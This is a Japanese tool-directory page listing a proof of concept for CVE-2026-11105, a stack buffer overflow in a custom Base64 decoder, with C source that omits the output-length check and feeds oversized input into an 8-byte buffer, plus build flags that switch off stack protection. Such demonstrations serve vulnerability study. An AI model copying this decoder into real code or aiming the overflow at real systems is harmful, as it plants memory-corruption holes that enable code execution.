Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-11105-Stack-Buffer-Overflow-in-Custom-Base64-Decoder — CVE-2026-11105 PoC は、カスタム Base64 デコーダにおけるスタックバッファオーバーフローを実証するものです。巧妙に細工された過大な入力がスタックメモリを上書きし、任意のコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-11105-stack-buffer-overflow-in-custom-base64-decoder
脆弱性分析エクスプロイト学習と教育ペイロード開発バイナリエクスプロイト
GitHubgeorge0papasotiriou/cve-2026-11105-stack-buffer-overflow-in-custom-base64-decoder

CVE-2026-11105-Stack-Buffer-Overflow-in-Custom-Base64-Decoder

CVE-2026-11105 PoC は、カスタム Base64 デコーダにおけるスタックバッファオーバーフローを実証するものです。巧妙に細工された過大な入力がスタックメモリを上書きし、任意のコード実行を可能にします。

リポジトリを見る
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-11105 – カスタムBase64デコーダのスタックバッファオーバーフロー

プログラムコード (C)

root@kitploit:~
// base64_vuln.c - Vulnerable Base64 decoder
#include <stdio.h>
#include <string.h>
#include <stdint.h>

int base64_decode(const char *in, size_t inlen, char *out, size_t outlen) {
    static const char table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    int outpos = 0;
    for (int i=0; i<inlen; i+=4) {
        uint32_t sextet = 0;
        int bytes = 0;
        for (int j=0; j<4; j++) {
            if (i+j >= inlen) break;
            const char *p = strchr(table, in[i+j]);
            if (p) sextet = (sextet << 6) | (p - table);
            else bytes++;
        }
        // No check on outpos exceeding outlen!
        out[outpos++] = (sextet >> 16) & 0xFF;
        if (bytes < 2) out[outpos++] = (sextet >> 8) & 0xFF;
        if (bytes < 1) out[outpos++] = sextet & 0xFF;
    }
    return outpos;
}

int main() {
    char smallbuf[8];
    char *malicious = "AAAA"; // padded, decodes to 3 bytes, but we'll feed a long string
    // Attacker sends very long Base64 string, overflows smallbuf
    base64_decode("QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB", 60, smallbuf, 8);
    return 0;
}

CVE-2026-11105 – Base64デコーダのスタックバッファオーバーフロー

Severity: Critical

概要

カスタムのBase64デコード関数が出力バッファのサイズを検証しないため、古典的なスタックバッファオーバーフローが発生します。攻撃者は過剰なサイズの入力を細工してリターンアドレスを上書きし、コード実行を獲得できます。

脆弱性の詳細

  • 種別: スタックバッファオーバーフロー
  • 影響: リモートコード実行(ネットワーク経由で公開されている場合)。
  • 根本原因: デコーダが出力ポインタを割り当て済みバッファ内に保つことを確認せずに、デコード済みバイトを順次書き込むため。

エクスプロイトのデモ

  1. 脆弱なデコーダをコンパイルします(保護を無効化):
    root@kitploit:~
    gcc -o base64_vuln base64_vuln.c -fno-stack-protector -z execstack
    
  2. エクスプロイトスクリプトを実行してオーバーフローを発火させます:
    root@kitploit:~
    python exploit_base64_overflow.py
    
ツールをダウンロード